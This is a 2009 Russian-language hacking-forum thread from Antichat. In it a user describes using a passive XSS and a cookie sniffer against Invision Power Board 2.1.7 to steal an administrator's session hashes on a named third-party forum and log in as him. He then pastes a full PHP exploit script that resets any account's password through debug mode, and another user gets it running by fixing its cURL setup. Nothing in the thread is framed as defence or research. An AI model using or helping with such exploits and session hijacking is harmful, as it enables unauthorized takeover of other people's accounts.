Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Феномен с хешами IPB 2.1.7 |
07.07.2009, 10:33
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Феномен с хешами IPB 2.1.7
В общем, уважаемые античатовцы такая запара. Вчера значит, создал я сайтец что бы вытащить хеши одного человека с админ правами. Допустим он редиска. Перед этим проверял на друге - так вот все отлично , вставив его хеш и ID я уже мог под ним ходить, пробую уже вечером на админе (а позже пробовал и на своем мульте) - я не захожу по плану под его аккаунтом, я почему то выкидываюсь из аккаунта вообще. Возможно потому, что делал не сразу , а через 4 часа. Хотя по идее зная хеш и member id я должен спокойно висеть под ним. Юзал пассивную Xss для 2.1.7, у кого была такая проблема или кто сталкивался напишите пожалуйста.
|
|
|
07.07.2009, 13:25
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Вот уже второй раз он по ссылке прошел, может стоит какой патч специально для админов ?!
|
|
|
|
07.07.2009, 13:39
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Есть такая великая вещь под названием "Session"
|
|
|
|
07.07.2009, 13:48
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 33
Провел на форуме:
140077
Репутация:
93
|
|
сесию нужно чтобы попасть
|
|
|
|
07.07.2009, 14:12
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Я входил под чужим акком и без сессии, но я понял в чем тема. Короче пашет без сессии на юзерах и модерах, а на админов не пашет потому что они соеденены через базу данных с одной игровой фишкой. Сессия тут не при чем, я ее тоже пробовал. Вы бы лучше посоветовали уязвимость через модера какую)))
|
|
|
|
07.07.2009, 14:14
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Кому интересно fo*rum.je*di.co*m.ua (без *) ссылка.
Кому интересно для опыта поиграть с этим форумом отписывайтесь))) Он хорошо сделан, будет в удовольствие разбираться...
Последний раз редактировалось G4bR1eL; 07.07.2009 в 14:21..
|
|
|
|
07.07.2009, 14:19
|
|
Участник форума
Регистрация: 26.07.2007
Сообщений: 106
Провел на форуме:
865762
Репутация:
82
|
|
ГО http://milw0rm.com/exploits/4841
|
|
|
|
07.07.2009, 15:27
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Хм, еще вопрос.
<?php /*
Debug Mode password change vulnerability Affects Invision Power Borard 2.0.0 to 2.1.7 by Rapigator This works if: "Debug Level" is set to 3 or Enable SQL Debug Mode is turned on In General Configuration of the forum software. */ // The forum's address up to and including 'index.php' $site = "http://localhost/forums/index.php"; // An existing user's login name $name = "admin"; // The new password(3-32 characters) $pass = "1234"; // You can use a proxy... // $proxy = "1.2.3.4:8080"; // ----------------------------- $site .= "?"; $suffix = ""; $name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } else { $suffix = "&debug=1"; $curl = curl_init($site.'act=Reg&CODE=10'.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } } if (!isset($regid) || !isset($regcode)) { echo "Error: Probably not vulnerable, or no forum found"; exit; } $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$regid }®_code={$regcode}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } function change_pass($regcode,$regid,$vid,$userid) { global $site, $proxy, $name, $pass; $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={ $vid}®id={$regid}®_code={$regcode}&pass1={$p ass}&pass2={$pass}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); echo "Password Changed!"; exit; } ?> # milw0rm.com [2006-11-01]
Делал этот код (естественно заменял что надо), почему то программа выходит с такой ошибкой Fatall error: Call to undefined function curl_init() in C:\sploits\- Online 37. В нете нашел библиотеку dll не помогло. Опять же гуру помогите советом))
Последний раз редактировалось G4bR1eL; 07.07.2009 в 15:31..
|
|
|
|
07.07.2009, 21:08
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Может кто сталкивался на практике... У друга моего похожая группа на том форуме, хеш которой я не могу использовать (с сессией или же без). Смотрите феномен, когда он 3 раза подряд заходит на мойт сайт со сниффом не выходя из оперы хеш остается таким же, когда закрывает оперу, открывает мое ПМ и переходит по ссылке (периодизация осуществляется 3 раза) ровно три раза меняется хеш... Какие идеи ???!!!
|
|
|
|
07.07.2009, 23:25
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от G4bR1eL
Хм, еще вопрос.
Делал этот код (естественно заменял что надо), почему то программа выходит с такой ошибкой Fatall error: Call to undefined function curl_init() in C:\sploits\- Online 37. В нете нашел библиотеку dll не помогло. Опять же гуру помогите советом))
Нужен курл епть.
Поставь PHP с уже установленным CURL
Или ваще связку сервера...
Библиотеку то ты нашёл
Её то надо вписать в php.ini 
ps
А мож и раскоментировать...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
